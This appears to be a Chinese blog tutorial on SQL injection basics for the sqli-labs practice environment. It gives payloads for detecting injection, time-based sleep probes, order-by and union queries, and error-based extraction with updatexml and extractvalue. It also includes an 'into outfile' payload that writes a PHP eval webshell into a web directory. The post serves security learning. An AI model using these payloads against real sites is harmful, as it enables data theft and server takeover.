【SQL注入】0x2 sql注入基础知识

最新推荐文章于 2022-10-12 23:04:07 发布
最新推荐文章于 2022-10-12 23:04:07 发布
阅读量407 收藏 1
点赞数
分类专栏: CTF 文章标签: mysql 数据库 ctf sql注入 sqli-labs
原文链接:https://www.anquanlong.com/lab_introduce?lab_id=3
版权

0x2 sql注入基础知识

0x2.1 如何判断否存在sql注入

常见的判断:
1、get 单引号判断
?id=1' 如果报错说明存在sql注入
例如我们实验室:
打开漏洞环境Less-1错误型GET单引号字符型注入
输入?id=1显示正常
输入?id=1'显示错误,所以就存在sql注入
'的url编码是%27



2、get and判断
输入?id=-1 and 1=1 正常
输入?id=-1'and 1=2 报错
如果报错,那就存在sql,在请求字符串或者id参数后面加入 '单引号,是常见的一种发现是否存在sql注入的方法。
3、Or、xor判断
or xor方法和and方法一致。
4、sql运算符判断
输入?id=5-0
输入?id=5-1
输入?id=5+1
通过匹对获取到的内容是否一致,不一致代表存在sql注入,因为存在了你输入的payload运算执行;
5、通过sleep函数演示显示的形式进行判断
构造的payload

?id=1' and if(left(database(),1)='s',sleep(3),1)--+

*表示3秒后响应内容,这个大家可以通过实验环境测试看看~

6、服务端返回错误形式
错误直接回显在页面上
错误隐藏在页面源代码中
检测到错误跳转到另一个页面
返回HTTP错误代码500或重定向302
适当处理错误结果,常显示一个通用错误页面

7、其它方法…

0x2.2 了解post、get、编码

常用

'or and 1=1 # 'or and 1=1 –-+

#是sql语句中的注释符;

+ 在http请求中表示空格;

-- 后面的语句相当于被注释掉,不执行后面的sql语句;

--+代表闭合sql查询语句,如果没加,无法形成有效的mysql语句,这是sql注入中常见的巧妙运用。

在post参数中
要加空格符,直接输入空格服即可;用+会被http请求转义为%2B编码;
在get请求中
在get请求中如果有空格,需要用空格符编码%20来替代,不然会请求报错;
如果用#表示不提交#后面的参数到服务端,但是转成%23编码就可以提交过去;
常见URL编码
空格 %20 +%2b <%3c >%3e

更多参考http://www.w3school.com.cn/tags/html_ref_urlencode.html
或者工具查询http://tool.chinaz.com/tools/urlencode.aspx

神奇的编码可以进行各种绕过!

0x2.3 了解sql注入常用mysql函数

1、order by
该函数用于对结果集进行排序,主要用于猜字段。
例如我们在实验室less-1
输入?id=1要确定它里面有多少个字段,就要用到order by了
例如输入?id=1' order by 3 --+ 显示正常
再次输入?id=1' order by 4 --+ 显示错误
所以的出,在?id=1查看的这个表有3个字段

2、union
union在sql注入测试过程中,几乎经常用到,实验室例子:

?id=-1' union select 1,user(),database() --+


3、MID
SELECT MID(ColumnName, Start [, Length]) FROM TableName
4、LEFT(str,len)
返回字符串str的最左面len个字符
5、ASCII(str) =ORD
返回字符串str的最左面字符的ASCII代码值。如果str是空字符串,返回0。如果str是NULL,返回NULL
6、SUBSTR(str,pos,len)
从str中多少个字符开始,截取多少位
7、CAST
SELECT CAST(’12’ AS int) 将目标str转化为目标数据类型
8、IFNULL(expr1,expr2)
如果expr1不是NULL,IFNULL()返回expr1,否则它返回expr2
9、updatexml()
updatexml(1,concat(0x7e,user(),0x7e),1)
其中的concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误显示user()该函数。但显示出来的内容最多只有32个字符串;利用原理对他是对XML文档进行更新的函数;
语法:updatexml(目标xml文档,xml路径,更新的内容)
10、extractvalue()
extractvalue也是运用于报错sql注入;利用原理对XML文档进行查询的函数;
语法:extractvalue(目标xml文档,xml路径)
熟悉mysql常见的判断语句函数
参考文章http://www.runoob.com/mysql/mysql-functions.html
11、LOAD_FILE
可以利用该函数,进写入shell
用法:select load_file(‘file1’) into outfile ‘file2’
将file1的文件导入WEB目录file2的文件中进行访问!
例子:

?id=1’)) union select 1,2,’<?php @eval($_POST[“cmd”]);?>’ into outfile “/home/wwwroot/default/test.php”—+

细致使用参考文章:https://www.cnblogs.com/blacksunny/p/8060028.html

学习完以上基础知识我们来进行下一步实战实验

Mitch311
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入之必备的基础知识
09-10
所有的知识点都是在sql注入中最常用到也是最基础的知识点。对于一个需要精通sql语句的web安全工程师来说,下面的知识是必须要掌握的。下面的知识也是学习sql注入最基本的知识。下面大家来一起看看吧。
SQL注入基础知识
01-18
SQL注入基础知识的学习,可以对你有很大的帮助,避免在开发过程中出现更多的安全问题
记一次简单的 updatexml报错注入
cxk
03-24 2129
朋友发的,问怎么注入 有大佬发了,报错注入。那就来锤他 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value...
0x2E.SQL手工注入漏洞测试(SQLite数据库)
qq_31679787的博客
11-14 262
通过加单引号及使用and进行判断存在sql注入; 使用order by测试存在4列; 通过联合查询得到显示位; 通过sqlite_master隐藏表爆表名及建表语句; 建表语句中可以得到表名及列名,可以爆出数据; Md5解密后得到密码; 登录得到key; SQLite存在sqlite_maste...
0x35.SQL注入实战(防注入)-Access
qq_31679787的博客
12-10 178
查找资料得知,sql通用防注入系统写入的日志文件为sqlin.asp,所以构造一句话木马写入文件中; 发现无法写入后通过URL编码进行绕过; 使用菜刀连接并找到key; ...
SQL】0x02查询数据
weixin_41687289的博客
02-28 518
在关系数据库中,最常用的操作就是查询。 准备数据 本文所提及的都是从廖雪峰老师的网站上在线练习的。 为了便于讲解和练习,我们先准备好了一个students表和一个classes表,它们的结构和数据如下: students表存储了学生信息: classes表存储了班级信息: 请注意,和MySQL的持久化存储不同的是,由于我们使用的是AlaSQL内存数据库,两张表的数据在页面加载时导入,并且只存在...
SQL单月份的话需要展示“0X”的格式
∑'αγαπώ的博客
07-11 166
在项目中财务会计模块的凭证等查询的SQL单月份的话需要“0X”的格式
0x31.SQL注入漏洞测试(报错盲注)
qq_31679787的博客
11-15 142
使用单引号测试发现页面会输出报错信息,所以可以使用报错注入; 通过updatexml函数进行报错注入; 爆数据库; 爆表名; 爆列名; 爆数据; md5解密后得到登录得到key; ...
DB2数据库SQL注入手册1
08-08
2. 参数化查询:使用参数化查询可以防止SQL注入攻击,因为恶意代码无法被作为参数传递。 3. 访问控制:限制数据库访问权限,以防止未经授权的访问。 常见SQL注入攻击 以下是一些常见的SQL注入攻击: 1. Union攻击...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
sql注入基础知识.rar
最新发布
04-17
sql注入 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗...
sql 注入_sql注入笔记一——寻找sql注入
weixin_39926191的博客
11-16 482
在http请求中sql注入点通常存在在get,post请求中。但是有几个地方也不能忽略,如:cookie:识别用户的唯一标识主机头:指定请求资源的internet主机和端口号引用站点头(host):指定获取当前请求的资源用户代理头(user-agent):确定用户使用的web浏览器。服务端有很大可能将这些数据存入数据库中。攻击者可以将这些数据篡改为攻击语句。是服务器存入数据库。1.” ’ ”(单引...
SQL】0x05补充
weixin_41687289的博客
03-13 290
太多了一会儿统计先听听课。
数据库原理与安全】0x02 SQL基础语法
weixin_45844670的博客
09-29 1234
这里写自定义目录标题SQL语言概述SQL特点基本概念数据定义数据库的创建与管理创建数据库修改数据库删除数据库表的创建和管理创建表修改表删除表SQL的数据定义命令索引的分类按数据存储结构分按数据唯一性分索引的建立索引的修改索引的删除数据更新数据插入数据修改数据删除 SQL语言概述 ▪ SQL(Structured Query Language) 结构化查询语言,是关系数据库的标准语言 ▪ SQL是一个通用的、功能极强的关系数据库语言 包括以下几个方面: (1)数据定义(Data Definition) 用来定
记一次sql挖掘实战(报错注入)
weixin_51646864的博客
04-22 3756
学习完报错注入手法后刚巧在挖洞时就遇到了一个报错注入漏洞,特此记录一下 2、抓到的数据包如下:然后送到重发器 3、尝试在mobile参数后加单引号“ ' ”,点击发送数据包 4、看到返回包中提示sql语句查询出错,所以这里存在sql注入 5、由于没有回显位,所以使用报错注入。 构造语句:1' and updatexml(1,concat(0x7e,(database()),0x7e),1)# 6、点击发送数据包后,可以在响应包中看到爆出数据库名 .
多字节%bf%27注入
weixin_30745641的博客
04-20 871
渗透测试,注入是很常见的手法了。记得有个很经典的多字节编码漏洞。其漏洞引发的原理是:0xbf27不是有一个有效的GBK字符,但是经过addslashed()转换后就变成0xbf5c27,0xbf5c是个有效的GBK字符,所以0xbf5c27会当作一个字符0xbf5c和一个单绰号来处理,结果是跟在引号后查询语句得到了执行。在phpcms2007程序里由多字节编码漏洞引发的漏洞有多个,以area.ph...
SQL注入中的报错注入,updatexml(1,concat(0x7e,database(),0x7e),1)
m0_51756263的博客
07-15 4090
SQL注入中的报错注入,updatexml(1,concat(0x7e,database(),0x7e),1)
SQL注入—报错注入
qidiandexiaowu
09-14 232
本来在BUU上刷题,刷到一个叫hard SQLSQL注入题,没思路看到大师傅的wp,是SQL注入里的报错注入,虽说我也接触过报错注入,但是这道题把union过滤了,双查询报错没用了;吓得我赶紧学习了基于 xpath报错注入(extractvalue和updatexml) 先来解释一下:XPath 即为 XML 路径语言,是 W3C XSLT 标准的主要元素,它是一种用来确定 XML(标准通用标记语言的子集)文档中某部分位置的语言。 XPath具体的语法我也就不说了(我不会啊????) 报错注入就是我们在查
sql异同或注入总结
Aiwin的博客
10-12 1916
sql异同或注入总结与[NSSCTF 2022 Spring Recruit]babysql与[CISCN 2019华北Day2]Web1例题
SQL注入基础:解析Access数据库的注入技术
"SQL注入基础教程,讲解了SQL注入的概念、危害以及如何进行基本的注入测试。" 在网络安全领域,SQL注入是一种常见的攻击手段,通过利用应用程序处理...因此,理解和掌握SQL注入基础知识对于维护网络安全至关重要。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值